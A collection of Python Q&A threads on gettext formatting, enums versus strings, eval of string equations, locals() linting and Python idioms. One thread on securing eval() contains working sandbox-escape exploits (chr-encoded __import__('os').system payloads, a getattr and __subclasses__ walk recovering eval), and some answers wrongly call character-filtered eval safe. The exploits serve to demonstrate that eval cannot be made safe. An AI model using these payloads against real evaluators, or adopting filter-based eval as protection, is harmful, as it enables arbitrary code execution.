Best practice for string substitution with gettext using Python

Looking for best practice advice on what string substitution technique to use when using gettext(). Or do all techniques apply equally?
I can think of at least 3 string techniques:
1) Classic "%" based formatting:
"My name is %(name)s" % locals()
2) .format() based formatting:
"My name is {name}".format( locals() )
3) string.Template.safe_substitute()
import string
template = string.Template( "My name is ${name}" )
template.safe_substitute( locals() )
The advantage of the string.Template technique is that a translated string with an incorrectly spelled variable reference can still yield a usable string value, while the other techniques unconditionally raise an exception. The downside of the string.Template technique appears to be the inability to customize how a variable is formatted (padding, justification, width, etc).
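To make the trade-off concrete (a minimal sketch; the misspelled ${nmae} stands in for a typo that slipped into a translation):
import string

name = "Alice"
template = string.Template("My name is ${nmae}")  # note the misspelled placeholder
print(template.safe_substitute(name=name))        # prints "My name is ${nmae}" -- degraded but usable

try:
    "My name is {nmae}".format(name=name)
except KeyError as exc:
    print("format() raised KeyError:", exc)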

Actually I would prefer to get an exception during my tests, to fix the error as soon as possible -- "errors should not pass silently". So I consider that approach (2) is the best one in modern Python (which supports the readable and flexible format), and approach (1) a probably inevitable fall-back if you're stuck supporting older Python releases (where % was "the" way to do flexible formatting -- finding, or coding, some backport of format would be the main alternative).

Don't have incorrectly spelled variable names - that's what testing is for.
On the face of it, displaying something seems better than throwing an exception, but sooner or later one of those mistranslations is bound to cause offence to some user.
.format() is the way to go these days.
Reconsider passing locals() straight into the translation. It will save you worrying about what happens if someone works out a way to do something sneaky with self in one of the translations.
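A sketch of the safer pattern: translate first, then pass only the names the template needs (here _ is the conventional gettext alias):
import gettext
_ = gettext.gettext  # identity translation; real code would install a proper catalog

name = "Alice"
# Explicit keyword arguments expose nothing beyond what the string needs.
print(_("My name is {name}").format(name=name))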

Related

Enum vs String as a parameter in a function

I noticed that many libraries nowadays seem to prefer the use of strings over enum-type variables for parameters.
Where people would previously use enums, e.g. dateutil.rrule.FR for a Friday, it seems that this has shifted towards using string (e.g. 'FRI').
Same in numpy (or pandas for that matter), where searchsorted for example uses strings (e.g. side='left', or side='right') rather than a defined enum. For the avoidance of doubt, before python 3.4 this could have been easily implemented as an enum as such:
class SIDE:
    RIGHT = 0
    LEFT = 1
And the advantages of enums-type variable are clear: You can't misspell them without raising an error, they offer proper support for IDEs, etc.
So why use strings at all, instead of sticking to enum types? Doesn't this make the programs much more prone to user errors? It's not like enums create an overhead - if anything they should be slightly more efficient. So when and why did this paradigm shift happen?
I think enums are safer especially for larger systems with multiple developers.
As soon as the need arises to change the value of such an enum, looking up and replacing a string in many places is not my idea of fun :-)
The most important criterion IMHO is the usage: for use in a module or even a package a string seems to be fine; in a public API I'd prefer enums.
[update]
As of today (2019), Python has dataclasses; combined with optional type annotations and static type analyzers like mypy, I think this is a solved problem.
As for efficiency, attribute lookup is somewhat expensive in Python compared to most languages, so I guess some libraries may still choose to avoid it for performance reasons.
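As a sketch of that static-checking point (my addition: typing.Literal, available on Python 3.8+ or via typing_extensions, is one way to have mypy reject a misspelled string before runtime):
from typing import Literal

Side = Literal['left', 'right']

def searchsorted(a, v, side: Side = 'left'):
    ...  # stand-in for a real implementation

searchsorted([1, 2, 3], 2, side='rigth')  # mypy flags this; plain Python runs it unchecked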
[original answer]
IMHO it is a matter of taste. Some people like this style:
def searchsorted(a, v, side='left', sorter=None):
    ...
    assert side in ('left', 'right'), "Invalid side '{}'".format(side)
    ...

numpy.searchsorted(a, v, side='right')
Yes, if you call searchsorted with side='foo' you may get an AssertionError way later at runtime - but at least the bug will be pretty easy to spot looking at the traceback.
While other people may prefer (for the advantages you highlighted):
numpy.searchsorted(a, v, side=numpy.CONSTANTS.SIDE.RIGHT)
I favor the first because I think seldom-used constants are not worth the namespace cruft. You may disagree, and people may align with either side due to other concerns.
If you really care, nothing prevents you from defining your own "enums":
class SIDE(object):
    RIGHT = 'right'
    LEFT = 'left'

numpy.searchsorted(a, v, side=SIDE.RIGHT)
I think it is not worth it, but again it is a matter of taste.
[update]
Stefan made a fair point:
As soon as the need arises to change the value of such an enum, looking up and replacing a string in many places is not my idea of fun :-)
I can see how painful this can be in a language without named parameters - using the example you have to search for the string 'right' and get a lot of false positives. In Python you can narrow it down searching for side='right'.
Of course if you are dealing with an interface that already has a defined set of enums/constants (like an external C library) then yes, by all means mimic the existing conventions.
I understand this question has already been answered, but there is one thing that has not been addressed at all: the fact that Python Enum members must be explicitly asked for their .value when you want the underlying value they store.
>>> from enum import Enum
>>> class Test(Enum):
...     WORD = 'word'
...     ANOTHER = 'another'
...
>>> str(Test.WORD.value)
'word'
>>> str(Test.WORD)
'Test.WORD'
One simple solution to this problem is to offer an implementation of __str__()
>>> class Test(Enum):
...     WORD = 'word'
...     ANOTHER = 'another'
...     def __str__(self):
...         return self.value
...
>>> Test.WORD
<Test.WORD: 'word'>
>>> str(Test.WORD)
'word'
Yes, adding .value is not a huge deal, but it is an inconvenience nonetheless. Using regular strings requires zero extra effort, no extra classes, and no redefinition of default class methods. Still, with Enums you end up casting explicitly to a string value in many places where a plain str would have worked without a second thought.
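A common workaround worth noting (my addition, not part of the answer above): mix str into the Enum so that members are themselves strings, with no .value or __str__ boilerplate needed. Python 3.11 later formalized this pattern as enum.StrEnum.
from enum import Enum

class Test(str, Enum):
    WORD = 'word'
    ANOTHER = 'another'

# Members are str instances, so they compare and behave like plain strings.
assert Test.WORD == 'word'
assert Test.WORD.upper() == 'WORD'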
I prefer strings for debugging reasons. Compare an object like
side=1, opt_type=0, order_type=6
to
side='BUY', opt_type='PUT', order_type='FILL_OR_KILL'
I also like "enums" where the values are strings:
class Side(object):
    BUY = 'BUY'
    SELL = 'SELL'
    SHORT = 'SHORT'
Strictly speaking Python does not have enums - or at least it didn't prior to v3.4
https://docs.python.org/3/library/enum.html
I prefer to think of your example as programmer defined constants.
In argparse, one set of constants has string values. While the code uses the constant names, users more often use the strings.
e.g. argparse.ZERO_OR_MORE = '*'
argparse.OPTIONAL = '?'
numpy is one of the older third-party packages (at least its roots, like Numeric, are). String values are more common there than enums. In fact I can't offhand think of any enums (as you define them).

Convert a string equation to an integer answer

If I have a string
equation = "1+2+3+4"
How do I evaluate it to get the integer answer? I was thinking something like this, but it gives an error.
answer = (int)equation
print(answer)
The equation could contain +-*/
If you are prepared to accept the risks, namely that you may be letting hostile users run whatever they like on your machine, you could use eval():
>>> equation = "1+2+3+4"
>>> eval(equation)
10
If your code will only ever accept input that you control, then this is the quickest and simplest solution. If you need to allow general input from users other than you, then you'd need to look for a more restrictive expression evaluator.
Update
Thanks to @roippi for pulling me up and pointing out that the code above executes in the environment of the calling code. So the expression would be evaluated with local and global variables available. Suppress that like so:
eval(equation, {'__builtins__': None})
This doesn't make the use of eval() secure. It just gives it a clean, empty environment in which to operate. A hostile user could still hose your system.
If we wanted to expose a calculator to the world, I'd be very interested to see if a cracker could work around this:
import string

def less_dangerous_eval(equation):
    if not set(equation).intersection(string.ascii_letters + '{}[]_;\n'):
        return eval(equation)
    else:
        print("illegal character")
        return None

less_dangerous_eval('1*2/3^4+(5-6)')
returns:
3
(under Python 2, where / is integer division and ^ is bitwise XOR)
I know that this can be broken by giving it bad syntax (fixable with a try/except block) or an operation that would take up all of the memory in the system (try/except catching this might be more iffy), but I am not currently aware of any way for someone to gain control.
This works if you only have digits and plusses:
answer = sum(float(i) for i in equation.split('+'))
or if you know they will only be integers
answer = sum(int(i) for i in equation.split('+'))
If you want to be able to evaluate more than that, I suggest you do your homework:
Look up the string module (which has string.digits)
the math module, which has your operations
create logic to perform the operations in proper order
Good luck!
I suggest you use eval and check the input:
def evaluate(s):
    import string
    for i in s:
        if i not in "+-*/ " + string.digits:
            return False  # input is not valid
    return eval(s)
As already mentioned, eval is unsafe and very difficult to make safe. (I remember seeing a very good blog post explaining this; does anyone know which it was?) However, ast.literal_eval is safe: it doesn't allow __import__ etc. I would strongly recommend using ast.literal_eval instead of eval whenever possible. Unfortunately, in this case it isn't possible. However, in a different case, e.g. one where you only need to support addition and multiplication, you could (and should) use literal_eval instead.
On the other hand, if this is homework with the intention for you to learn about parsing, then I would suggest doing this a different way. I know that if I was a teacher, I would respond to an answer using eval with "Very clever, but this won't help you pass a test on abstract syntax trees." (which are incidentally one thing that you should look at if you want to implement this "properly").
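For completeness, here is a minimal sketch of that parsing approach using the standard ast module (my addition; it assumes Python 3.8+, where number literals parse as ast.Constant):
import ast
import operator

# Map AST operator node types to the corresponding arithmetic functions.
_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}

def safe_arith_eval(expression):
    """Evaluate a string limited to numbers and the + - * / ( ) operators."""
    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](_eval(node.left), _eval(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -_eval(node.operand)
        raise ValueError("unsupported syntax: %s" % ast.dump(node))
    return _eval(ast.parse(expression, mode='eval'))

print(safe_arith_eval("1+2+3+4"))  # 10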

PEP8, locals() and interpolation

Here is some code:
foo = "Bears"
"Lions, Tigers and %(foo)s" % locals()
My PEP8 linter (SublimeLinter) complains about this, because foo is "unreferenced". My question is whether PEP8 should count this type of string interpolation as "referenced", or if there is a good reason to consider this "bad style".
Well, it isn't referenced. The part that's questionable style is using locals() to access variables instead of just accessing them by name. See this previous question for why that's a dubious idea. It's not a terrible thing, but it's not good style for a program that you want to maintain in the long term.
Edit: It's true that when you use a literal format string, it seems more explicit. But part of the point of the previous post is that in a larger program, you will probably wind up not using a literal format string. If it's a small program and you don't care, go ahead and use it. But warning about things that are likely to cause maintainability problems later is also part of what style guides and linters are for.
Also, locals isn't a canonical representation of the names that are explicitly referenced in the literal. It's a canonical representation of all names in the local namespace. You can still do it if you like, but it's basically a loose/sloppy alternative to explicitly using the names you're using, which is, again, exactly the sort of thing linters are supposed to warn you about.
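For contrast, the explicit forms that visibly reference foo (my restatement of the advice above):
foo = "Bears"
print("Lions, Tigers and %s" % foo)               # positional
print("Lions, Tigers and {foo}".format(foo=foo))  # named, still explicit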
Even if you reject BrenBarn's argument that foo isn't referenced, if you accept the argument that passing locals() in string formatting should be flagged, it may not be worth writing the code to consider foo referenced.
First, in every case where that extra code would help, the construct is not acceptable anyway, and the user is going to have to ignore a lint warning anyway. Yes, there is some harm in giving the user two lint warnings to ignore when there's only actually one problem, especially if one of the warnings is somewhat misleading. But is it enough harm to justify writing very complicated code and introduce new bugs into the linter?
You also have to consider that for this to actually work, the linter has to recognize not just % formatting, but also {} formatting, and every other kind of string formatting, HTML templating, etc. that the user could be using. In practice, this means handling various very common forms, and providing some kind of hook for the user to describe anything else.
And, on top of that, even if you don't think it should work with arbitrarily-generated format strings, it surely has to at least work with l10n. How is that going to work? If the format string is generated by something like gettext, the linter has no way of knowing whether foo is referenced, unless it can check all of the translations and see that at least one of them references foo—which means it has to understand (or have hooks to be taught) every string translation mechanism, and have access to the translation database.
So, I would suggest that, even if you consider the warning spurious in this case, you leave it there anyway. At most, add something which qualifies the warning:
foo is possibly unreferenced, but in a function that uses locals()
The following wouldn't make SublimeLinter happy either. It looks up each variable name referenced in the string and substitutes the corresponding value from the namespace mapping, which defaults to the caller's locals. As such it shows the inherent limitation a utility like SublimeLinter has when trying to determine whether something has been referenced in Python. My advice is to just ignore SublimeLinter or add code to fake it out, like foo = foo. I've had to do something like the latter to get rid of C compiler warnings about things which were both legal and intended.
import re
import sys

SUB_RE = re.compile(r"%\((.*?)\)s")

def local_vars_subst(s, namespace=None):
    if namespace is None:
        namespace = sys._getframe(1).f_locals
    def repl(matchobj):
        var = matchobj.group(1).strip()
        try:
            retval = namespace[var]
        except KeyError:
            retval = "<undefined>"
        return retval
    return SUB_RE.sub(repl, s)

foo = "Bears"
print local_vars_subst("Lions, Tigers and %(foo)s")

Is there a way to secure strings for Python's eval?

There are many questions on SO about using Python's eval on insecure strings (eg.: Security of Python's eval() on untrusted strings?, Python: make eval safe). The unanimous answer is that this is a bad idea.
However, I found little information on which strings can be considered safe (if any).
Now I'm wondering if there is a definition of "safe strings" available (eg.: a string that only contains lower case ascii chars or any of the signs +-*/()). The exploits I found generally relied on either of _.,:[]'" or the like. Can such an approach be secure (for use in a graph painting web application)?
Otherwise, I guess using a parsing package as Alex Martelli suggested is the only way.
EDIT:
Unfortunately, there are neither answers that give a compelling explanation for why/how the above strings are to be considered insecure (a tiny working exploit) nor explanations for the contrary. I am aware that using eval should be avoided, but that's not the question. Hence, I'll award a bounty to the first who comes up with either a working exploit or a really good explanation why a string mangled as described above is to be considered (in)secure.
Here you have a working "exploit" with your restrictions in place (only lower case ascii chars or any of the signs +-*/()).
It relies on a 2nd eval layer.
def mask_code(python_code):
    s = "+".join(["chr(" + str(ord(i)) + ")" for i in python_code])
    return "eval(" + s + ")"

bad_code = '''__import__("os").getcwd()'''
masked = mask_code(bad_code)
print masked
print eval(masked)
output:
eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(103)+chr(101)+chr(116)+chr(99)+chr(119)+chr(100)+chr(40)+chr(41))
/home/user
This is a very trivial "exploit". I'm sure there's countless others, even with further character restrictions.
It bears repeating that one should always use a parser or ast.literal_eval(). Only by parsing the tokens can one be sure the string is safe to evaluate. Anything else is betting against the house.
No, there isn't, or at least, not a sensible, truly secure way. Python is a highly dynamic language, and the flipside of that is that it's very easy to subvert any attempt to lock the language down.
You either need to write your own parser for the subset you want, or use something existing, like ast.literal_eval(), for particular cases as you come across them. Use a tool designed for the job at hand, rather than trying to force an existing one to do the job you want, badly.
Edit:
An example of two strings that, while fitting your description, would execute arbitrary code if eval()ed in order (this particular example running evil.__method__()):
"from binascii import *"
"eval(unhexlify('6576696c2e5f5f6d6574686f645f5f2829'))"
An exploit similar to goncalopp's, but one that also satisfies the restriction that the string 'eval' is not a substring of the exploit:
def to_chrs(text):
    return '+'.join('chr(%d)' % ord(c) for c in text)

def _make_getattr_call(obj, attr):
    return 'getattr(*(list(%s for a in chr(1)) + list(%s for a in chr(1))))' % (obj, attr)

def make_exploit(code):
    get = to_chrs('get')
    builtins = to_chrs('__builtins__')
    eval = to_chrs('eval')
    code = to_chrs(code)
    return (_make_getattr_call(
        _make_getattr_call('globals()', '{get}') + '({builtins})',
        '{eval}') + '({code})').format(**locals())
It uses a combination of genexp and tuple unpacking to call getattr with two arguments without using the comma.
An example usage:
>>> exploit = make_exploit('__import__("os").system("echo $PWD")')
>>> print exploit
getattr(*(list(getattr(*(list(globals() for a in chr(1)) + list(chr(103)+chr(101)+chr(116) for a in chr(1))))(chr(95)+chr(95)+chr(98)+chr(117)+chr(105)+chr(108)+chr(116)+chr(105)+chr(110)+chr(115)+chr(95)+chr(95)) for a in chr(1)) + list(chr(101)+chr(118)+chr(97)+chr(108) for a in chr(1))))(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(34)+chr(111)+chr(115)+chr(34)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(34)+chr(101)+chr(99)+chr(104)+chr(111)+chr(32)+chr(36)+chr(80)+chr(87)+chr(68)+chr(34)+chr(41))
>>> eval(exploit)
/home/giacomo
0
This proves that defining restrictions only on the text that make the code safe is really hard. Even banning something like the substring 'eval' is not enough. Either you must remove the possibility of executing a function call at all, or you must remove all dangerous built-ins from eval's environment. My exploit also shows that getattr is as bad as eval even when you cannot use the comma, since it allows you to walk arbitrarily deep into the object hierarchy. For example you can obtain the real eval function even if the environment does not provide it:
def real_eval():
    get_subclasses = _make_getattr_call(
        _make_getattr_call(
            _make_getattr_call('()',
                               to_chrs('__class__')),
            to_chrs('__base__')),
        to_chrs('__subclasses__')) + '()'
    catch_warnings = 'next(c for c in %s if %s == %s)()' % (
        get_subclasses,
        _make_getattr_call('c', to_chrs('__name__')),
        to_chrs('catch_warnings'))
    return _make_getattr_call(
        _make_getattr_call(
            _make_getattr_call(catch_warnings, to_chrs('_module')),
            to_chrs('__builtins__')),
        to_chrs('get')) + '(%s)' % to_chrs('eval')
>>> no_eval = __builtins__.__dict__.copy()
>>> del no_eval['eval']
>>> eval(real_eval(), {'__builtins__': no_eval})
<built-in function eval>
If, however, you remove all the built-ins, then the code becomes safe:
>>> eval(real_eval(), {'__builtins__': None})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <module>
NameError: name 'getattr' is not defined
Note that setting '__builtins__' to None also removes chr, list, tuple, etc.
The combo of your character restrictions and '__builtins__' set to None is completely safe, because the user has no way to access anything. He can't use the ., the brackets [], or any built-in function or type.
Even so, I must say that what you can evaluate this way is pretty limited; you can't do much more than operations on numbers.
Probably it's enough to remove eval, getattr, and chr from the built-ins to make the code safe; at least I can't think of a way to write an exploit that does not use one of them.
A "parsing" approach is probably safer and gives more flexibility. For example this recipe is pretty good and is also easily customizable to add more restrictions.
To study how to make eval safe, I suggest the RestrictedPython module (over 10 years of production usage; one fine piece of Python software):
http://pypi.python.org/pypi/RestrictedPython
RestrictedPython takes Python source code and modifies its AST (Abstract Syntax Tree) to make the evaluation safe within the sandbox, without leaking any Python internals which might allow escaping the sandbox.
From RestrictedPython source code you'll learn what kind of tricks are needed to perform to make Python sandboxed safe.
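A minimal usage sketch (my addition; compile_restricted and safe_builtins are the names RestrictedPython documents, though details vary between versions):
from RestrictedPython import compile_restricted, safe_builtins

source = "result = 1 + 2 * 3"
byte_code = compile_restricted(source, filename='<inline>', mode='exec')

# Execute with only the vetted built-ins available.
env = {'__builtins__': safe_builtins}
exec(byte_code, env)
print(env['result'])  # 6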
You probably should avoid eval, actually.
But if you're stuck with it, you could just make sure your strings are alphanumeric. That should be safe.
Assuming the named functions exist and are safe:
if re.match("^(?:safe|soft|cotton|ball|[()])+$", code): eval(code)
It's not enough to create input sanitization routines. You must also ensure that sanitization is not once accidentally omitted. One way to do that is taint checking.

What are the important language features (idioms) of Python to learn early on [duplicate]

I would be interested in knowing what the StackOverflow community thinks are the important language features (idioms) of Python. Features that would define a programmer as Pythonic.
Python (pythonic) idiom - "code expression" that is natural or characteristic to the language Python.
Plus, Which idioms should all Python programmers learn early on?
Thanks in advance
Related:
Code Like a Pythonista: Idiomatic Python
Python: Am I missing something?
Python is a language that can be described as: "rules you can fit in the palm of your hand with a huge bag of hooks".
Nearly everything in python follows the same simple standards. Everything is accessible, changeable, and tweakable. There are very few language level elements.
Take, for example, the len(data) builtin function. len(data) works by simply checking for a data.__len__() method, calling it, and returning the value. That way, len() can work on any object that implements a __len__() method.
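A quick illustration of that hook (a minimal sketch with a made-up Playlist class):
class Playlist:
    def __init__(self, songs):
        self.songs = list(songs)
    def __len__(self):
        # len(playlist) delegates to this method.
        return len(self.songs)

playlist = Playlist(["a", "b", "c"])
print(len(playlist))  # 3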
Start by learning about the types and basic syntax:
Dynamic Strongly Typed Languages
bool, int, float, string, list, tuple, dict, set
statements, indenting, "everything is an object"
basic function definitions
Then move on to learning about how python works:
imports and modules (really simple)
the python path (sys.path)
the dir() function
__builtins__
Once you have an understanding of how to fit pieces together, go back and cover some of the more advanced language features:
iterators
overrides like __len__ (there are tons of these)
list comprehensions and generators
classes and objects (again, really simple once you know a couple rules)
python inheritance rules
And once you have a comfort level with these items (with a focus on what makes them pythonic), look at more specific items:
Threading in python (note the Global Interpreter Lock)
context managers
database access
file IO
sockets
etc...
And never forget The Zen of Python (by Tim Peters)
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!
This page covers all the major python idioms: http://python.net/~goodger/projects/pycon/2007/idiomatic/handout.html
An important idiom in Python is docstrings.
Every object has a __doc__ attribute that can be used to get help on that object. You can set the __doc__ attribute on modules, classes, methods, and functions like this:
# this is m.py
""" module docstring """

class c:
    """class docstring"""
    def m(self):
        """method docstring"""
        pass

def f(a):
    """function f docstring"""
    return
Now, when you type help(m), help(m.f) etc. it will print the docstring as a help message.
Because it's just part of normal object introspection, this can be used by documentation-generating systems like epydoc or used for testing purposes by unittest.
It can also be put to more unconventional (i.e. non-idiomatic) uses such as grammars in Dparser.
Where it gets even more interesting to me is that, even though __doc__ is a read-only attribute on most objects, you can use them anywhere like this:
x = 5
""" pseudo docstring for x """
and documentation tools like epydoc can pick them up and format them properly (as opposed to a normal comment, which stays inside the code formatting).
Decorators get my vote. Where else can you write something like:
def trace(num_args=0):
    def wrapper(func):
        def new_f(*a, **k):
            print_args = ''
            if num_args > 0:
                print_args = ','.join(str(x) for x in a[:num_args])
            print('entering %s(%s)' % (func.__name__, print_args))
            rc = func(*a, **k)
            if rc is not None:
                print('exiting %s(%s)=%s' % (func.__name__, print_args, str(rc)))
            else:
                print('exiting %s(%s)' % (func.__name__, print_args))
            return rc
        return new_f
    return wrapper

@trace(1)
def factorial(n):
    if n == 0:
        return 1
    return n * factorial(n - 1)

factorial(5)
and get output like:
entering factorial(5)
entering factorial(4)
entering factorial(3)
entering factorial(2)
entering factorial(1)
entering factorial(0)
exiting factorial(0)=1
exiting factorial(1)=1
exiting factorial(2)=2
exiting factorial(3)=6
exiting factorial(4)=24
exiting factorial(5)=120
Everything connected to list usage.
Comprehensions, generators, etc.
Personally, I really like Python's syntax of defining code blocks by using indentation, and not by the words "BEGIN" and "END" (as in Microsoft's Basic and Visual Basic - I don't like these) or by using left- and right-braces (as in C, C++, Java, Perl - I like these).
This really surprised me because, although indentation has always been very important to me, I didn't make too much "noise" about it - I lived with it, and it is considered a skill to be able to read other people's "spaghetti" code. Furthermore, I never heard another programmer suggest making indentation a part of a language. Until Python! I only wish I had realized this idea first.
To me, it is as if Python's syntax forces you to write good, readable code.
Okay, I'll get off my soap-box. ;-)
From a more advanced viewpoint, understanding how dictionaries are used internally by Python. Classes, functions, modules, references are all just entries in a dictionary. Once this is understood it's easy to understand how to monkey patch and use the powerful __getattr__, __setattr__, and __call__ methods.
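A small sketch of what that dictionary view buys you (a made-up Greeter class, my addition):
class Greeter(object):
    def greet(self):
        return "hello"

print(Greeter.__dict__['greet'])  # methods are plain entries in the class dict
g = Greeter()

# Monkey patching: rebind the attribute at runtime.
Greeter.greet = lambda self: "hi there"
print(g.greet())  # 'hi there' -- existing instances see the change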
Here's one that can help. What's the difference between:
[ foo(x) for x in range(0, 5) ][0]
and
( foo(x) for x in range(0, 5) ).next()
Answer: in the second example, foo is called only once. This may be important if foo has a side effect, or if the iterable being used to construct the list is large.
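To see the difference for yourself (a minimal sketch with a deliberately noisy foo):
def foo(x):
    print('foo(%d)' % x)  # side effect to make the calls visible
    return x * 10

first_from_list = [foo(x) for x in range(0, 5)][0]  # prints foo(0) .. foo(4)
first_from_gen = next(foo(x) for x in range(0, 5))  # prints only foo(0)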
Two things that struck me as especially Pythonic were dynamic typing and the various flavors of lists used in Python, particularly tuples.
Python's list obsession could be said to be LISP-y, but it's got its own unique flavor. A line like:
return HandEvaluator.StraightFlush, (PokerCard.longFaces[index + 4],
PokerCard.longSuits[flushSuit]), []
or even
return False, False, False
just looks like Python and nothing else. (Technically, you'd see the latter in Lua as well, but Lua is pretty Pythonic in general.)
Using string substitutions:
name = "Joe"
age = 12
print "My name is %s, I am %s" % (name, age)
When I'm not programming in python, that simple use is what I miss most.
Another thing you cannot start early enough is probably testing. Here, especially, doctests are a great way of testing your code while explaining it at the same time.
doctests are simple text files containing an interactive interpreter session plus text, like this:
Let's instantiate our class::
>>> a = Something(text="yes")
>>> a.text
'yes'
Now call this method and check the results::
>>> a.canify()
>>> a.text
'yes, I can'
If e.g. a.text returns something different the test will fail.
doctests can be inside docstrings or standalone text files and are executed by using the doctest module. Of course the better-known unit tests are also available.
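Running them is a one-liner (a sketch; assume the session above was saved as example.txt):
import doctest

# Run all doctests found in a text file; verbose=True echoes each example.
doctest.testfile("example.txt", verbose=True)

# Or, for doctests living in docstrings of the current module:
# doctest.testmod()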
I think that online tutorials and books only talk about doing things, not about doing things in the best way. Along with Python syntax, I think that speed is in some cases important.
Python provides a way to benchmark functions, actually two!!
One way is to use the profile module, like so:
import profile

def foo(x, y, z):
    return x**y % z  # Just an example.

profile.run('foo(5, 6, 3)')
Another way to do this is to use the timeit module, like this:
import timeit

def foo(x, y, z):
    return x**y % z  # Can also be 'pow(x, y, z)', which is way faster.

timeit.timeit('foo(5, 6, 3)', 'from __main__ import *', number=100)
# timeit.timeit(testcode, setupcode, number=number_of_iterations)
